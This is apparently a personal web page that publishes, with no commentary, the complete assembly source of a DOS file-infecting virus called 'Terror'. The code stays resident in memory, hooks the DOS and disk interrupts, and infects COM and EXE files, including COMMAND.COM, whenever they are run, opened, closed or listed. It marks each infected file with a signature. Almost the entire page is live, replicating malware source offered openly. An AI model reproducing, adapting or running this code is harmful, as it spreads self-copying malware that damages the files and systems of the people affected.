Make your own free website on Tripod.com
Prev || Home
;**********************************************
;            Terror Virus
;**********************************************
Code		Segment
		Assume	CS:Code
		Org	100h
		
Start:		jmp	short Begin
Table310	dw	12E4h,09ABh
Table320	dw	138Dh,17D0h
Table330	dw	1460h,0F7Ah
FileBytes	dw	12 dup (9090h)
ComSpec		db	'A:\COMMAND.COM',0
CheckEXE:	cmp	cs:FileBytes,4D5Ah
		je	IsEXE
		cmp	cs:FileBytes,5A4Dh
IsEXE:		ret
Begin:		mov	word ptr cs:PSPSeg,ds
		push	ax
		mov	ax,0EC59h
		int	21h
		cmp	bp,ax
		jnz	Install
		push	cs
		pop	ds
StartFile:	pop	ax
		mov	es,word ptr cs:PSPSeg
		call	CheckEXE
		je	ExeFileStart
		mov	cx,13
		mov	si,offset FileBytes
		push	es
		mov	di,100h
		push	di
	rep	movsb
		push	es
		pop	ds
		retf
ExeFileStart:	mov	si,es
		add	si,10h
		add	cs:FileBytes [16h],si
		add	si,cs:FileBytes [0Eh]
		mov	di,cs:FileBytes [10h]
		push	es
		pop	ds
		cli
		mov	ss,si
		mov	sp,di
		sti
		jmp	dword ptr cs:FileBytes [14h]
Install:	mov	ah,30h
		int	21h
		mov	bx,offset Table310
		cmp	ax,0A03h
		jne	Not310
		mov	ax,0070h
		mov	bx,0D43h
		mov	es,ax
		cmp	byte ptr es:[bx],2Eh	; CS prefix
		jne	SetVectors
		mov	ax,bx
		jmp	short SetV1
Not310:		add	bx,4
		cmp	ax,1403h
		je	SetVectors
		add	bx,4
		cmp	ax,1E03h
		je	SetVectors
		mov	ax,3513h
		int	21h
		mov	word ptr cs:True13,    bx
		mov	word ptr cs:True13 + 2,es
		mov	ax,3521h
		mov	dx,bx
		jmp	short Set21
SetVectors:	mov	ax,word ptr cs:[bx+2]
SetV1:		mov	dx,word ptr cs:[bx]
		mov	word ptr cs:True13,ax
		mov	word ptr cs:True13 + 2,0070h
		mov	ah,34h
		int	21h
Set21:		push	es
		pop	ds
		mov	ax,25ECh
		int	21h
		mov	ax,word ptr cs:PSPSeg
		mov	es,ax
		dec	ax
		mov	ds,ax
		mov	bx,word ptr ds:[3]
		sub	bx,101
		add	ax,bx
		mov	word ptr es:[0002h],ax	; Setup PSP memory size.
						; Command.COM needs that
						; action; else the system
						; hangs.
		mov	ah,4Ah
		int	0ECh
		mov	bx,100
		mov	ah,48h
		int	0ECh
		sub	ax,10h
		mov	es,ax
		mov	byte ptr ds:[0000h],5Ah	; This is the last block,
						; don't you think so?
		push	cs
		pop	ds
		mov	si,100h
		mov	di,si
		mov	cx,MovedSize
	rep	movsb
		mov	di,offset Continue
		push	es
		push	di
		retf
Continue:	mov	word ptr es:[0F1h],0070h
		mov	ax,3521h
		int	0ECh
		mov	word ptr cs:Saved21,    bx
		mov	word ptr cs:Saved21 + 2,es 
		mov	ah,25h
		mov	dx,offset Int21
		push	cs
		pop	ds
		int	0ECh
		push	cs
		pop	es
		mov	di,offset Handles
		mov	cx,25
		mov	al,0
	rep	stosb
		jmp	StartFile
Respond:	mov	bp,ax
		iret
Int21:		cmp	ax,0EC59h
		je	Respond
		cmp	ax,4B00h
		je	Exec
		cmp	ah,3Dh
		je	Open
		cmp	ah,3Eh
		je	Close
		cmp	ah,11h
		jne	End21
		push	di
		mov	di,dx
		cmp	byte ptr ds:[di+6],08	; Volume ID attributes
		je	Find1st
EndF1st:	pop	di
End21:		db	0EAh
Saved21		dd	?
Exec:		call	InfectName
		jmp	End21
OpenEnd:	pop	cx
		jmp	End21
Open:		push	cx
		call	GetAttr
		jc	OpenEnd
		cmp	cx,20h
		pop	cx
		jne	End21
		mov	al,2
		pushf
		call	dword ptr cs:Saved21
		jc	Err21
		push	ax
		push	bx
		mov	bx,ax
		mov	al,byte ptr cs:Command?
		mov	byte ptr cs:Handles [bx],al
		pop	bx
		pop	ax
Err21:		retf	2
Close:		cmp	byte ptr cs:Handles [bx],0
		jz	End21
		push	ax
		mov	al,byte ptr cs:Handles [bx]
		mov	byte ptr cs:Command?,al
		mov	byte ptr cs:Handles [bx],0
		mov	ah,45h
		int	0ECh
		mov	word ptr cs:TempHandle,ax
		pop	ax
		jc	End21
		pushf
		call	dword ptr cs:Saved21
		jc	Err21
		push	bx
		mov	bx,word ptr cs:TempHandle
		push	ds
		call	SetV
		call	InfectHandle
		call	Restore
		pop	ds
		pop	bx
		clc
		retf	2
Find1st:	push	ax
		push	dx
		push	ds
		mov	al,byte ptr ds:[di+7]
		mov	dx,offset Comspec
		or	al,al
		jz	CurrentDrive
		add	al,'A'-1
		mov	byte ptr cs:Comspec,al
		jmp	short Infect1st
CurrentDrive:	add	dx,2
Infect1st:	push	cs
		pop	ds
		call	InfectName
		pop	ds
		pop	dx
		pop	ax
		jmp	EndF1st
InfectName:	push	ax
		push	bx
		push	cx
		call	GetAttr
		jc	EndIN0
		push	cx
		push	ds
		call	SetV
		pop	ds
		mov	ax,4301h
		xor	cx,cx
		int	0ECh
		jc	EndIN1
		mov	ax,3D02h
		int	0ECh
		mov	bx,ax
EndIN1:		pop	cx
		jc	EndInfName
		call	InfectHandle
		mov	ax,4301h
		int	0ECh
EndInfName:	call	Restore
EndIN0:		pop	cx
		pop	bx
		pop	ax
		ret
SetV:		push	ax
		push	dx
		push	bx
		push	es
		mov	ax,3513h
		int	0ECh
		mov	word ptr cs:Old13,bx
		mov	word ptr cs:Old13+2,es
		mov	al,24h
		int	0ECh
		mov	word ptr cs:Old24,bx
		mov	word ptr cs:Old24+2,es
		pop	es
		pop	bx
		push	cs
		pop	ds
		mov	dx,offset Critical
		mov	ah,25h
		int	0ECh
		mov	dx,offset Int13
		mov	al,13h
		int	0ECh
		pop	dx
		pop	ax
		ret
InfectHandle:	push	ax
		push	cx
		push	dx
		push	si
		push	di
		push	ds
		mov	di,offset FileBytes
		mov	cx,0FFFFh
		mov	dx,-6
		mov	ax,4202h
		int	0ECh
		mov	ah,3Fh
		mov	cx,6
		push	cs
		pop	ds
		mov	dx,di
		int	0ECh
		jc	EndH1
		cmp	word ptr cs:[di],'eT'
		je	EndH1
		xor	cx,cx
		xor	dx,dx
		mov	ax,4200h
		int	0ECh
		mov	ah,3Fh
		mov	cx,24
		mov	dx,di
		int	0ECh
		jnc	ReadOk
EndH1:		jmp	EndInfHandle
ReadOk:		xor	cx,cx
		xor	dx,dx
		cmp	byte ptr cs:Command?,2
		jne	Seek
		cmp	word ptr ds:[di+1],4000h	; Is there some
							; another virus
							; in the stack?
		ja	EndH1
		dec	cx
		mov	dx,-(VirusSize+64)
Seek:		mov	ax,4202h
Seek1:		int	0ECh
		test	ax,000Fh
		jz	SeekOk
		mov	cx,dx
		mov	dx,ax
		add	dx,10h
		and	dl,0F0h
		mov	ax,4200h
		jmp	Seek1
SeekOk:		call	CheckEXE
		je	SkipEXE
		or	dx,dx
		jnz	EndH1
		cmp	ax,1024
		jnb	MayBeGood?
		jmp	EndInfHandle
MayBeGood?:	cmp	ax,64000
		ja	EndInfHandle
SkipEXE:	mov	cl,4
		shr	ax,cl
		mov	si,ax
		mov	cl,12
		shl	dx,cl
		add	si,dx
		mov	ah,40h
		mov	dx,100h
		mov	cx,VirusSize
		int	0ECh
		jc	EndInfHandle
		call	CheckEXE
		jne	ComFile
		sub	si,10h
		sub	si,word ptr cs:[di+08h]
		mov	word ptr cs:[di+14h],100h
		mov	word ptr cs:[di+16h],si
		mov	word ptr cs:[di+10h],400h
		add	si,VirusSize / 16 + 1
		mov	word ptr cs:[di+0Eh],si
		mov	ax,4202h
		xor	cx,cx
		xor	dx,dx
		int	0ECh
		mov	cx,200h
		div	cx
		or	dx,dx
		jz	DontAdjust
		inc	ax
DontAdjust:	mov	word ptr cs:[di+02h],dx
		mov	word ptr cs:[di+04h],ax
		jmp	short Common
ComFile:	push	si
		push	di
		push	es
		push	cs
		pop	es
		mov	si,offset ComHeader
		mov	cx,11
	rep	movsb
		pop	es
		pop	di
		pop	ds:[di+11]
Common:		mov	ax,4200h
		xor	cx,cx
		xor	dx,dx
		int	0ECh
		mov	ah,40h
		mov	cx,24
		mov	dx,di
		int	0ECh
EndInfHandle:	mov	ax,5700h
		int	0ECh
		mov	al,1
		int	0ECh
		mov	ah,3Eh
		int	0ECh
		pop	ds
		pop	di
		pop	si
		pop	dx
		pop	cx
		pop	ax
		ret
Restore:	push	ax
		push	dx
		push	ds
		mov	ax,2513h
		mov	dx,word ptr cs:Old13
		mov	ds,word ptr cs:Old13+2
		int	0ECh
		mov	al,24h
		mov	dx,word ptr cs:Old24
		mov	ds,word ptr cs:Old24+2
		pop	ds
		pop	dx
		pop	ax
		ret
GetAttr:	push	ax
		push	es
		push	di
		push	bx
		mov	di,dx
		push	ds
		pop	es
		mov	al,0
		mov	cx,64
	repne	scasb
		mov	ax,word ptr ds:[di-3]
		mov	cx,word ptr ds:[di-5]
		and	ax,5F5Fh		; Upcase extension
		and	ch,5Fh
		cmp	ax,'MO'
		jne	Exe?
		cmp	cx,'C.'
		je	CommandChk
ErrAttr:	stc
		jmp	short EndAttr
Exe?:		cmp	ax,'EX'
		jne	ErrAttr
		cmp	cx,'E.'
		jne	ErrAttr
CommandChk:	mov	cx,7
		mov	bx,-1
Loop0:		inc	bx
		mov	al,byte ptr ds:[bx+di-12]
		and	al,5Fh
		cmp	al,byte ptr cs:Comspec [bx+3]
		loope	Loop0
		mov	al,1
		jne	NoCommand
		mov	al,2
NoCommand:	mov	byte ptr cs:Command?,al
		mov	ax,4300h
		int	0ECh
EndAttr:	pop	bx
		pop	di
		pop	es
		pop	ax
		ret
Critical:	mov	al,3
		iret
Int13:		cmp	ah,3
		jz	Skip13
		db	0EAh	; JMP Far
Old13		dd	?
Skip13:		db	0EAh
True13		dd	?
ComHeader	db	50h,8Ch,0C8h,01h,06h,0Bh,01h,58h,0EAh,00h,01h
Terror		db	' Terror'
VirusEnd	label	byte
VirusSize	=	offset VirusEnd - offset Start
Old24		dd	?
TempHandle	label	word
PSPSeg		dw	?
MovedSize	=	$ - offset Start
Handles		db	25 dup (?)
Command?	db	?
Code		EndS
		End	Start
--------------------------------------------------------------------------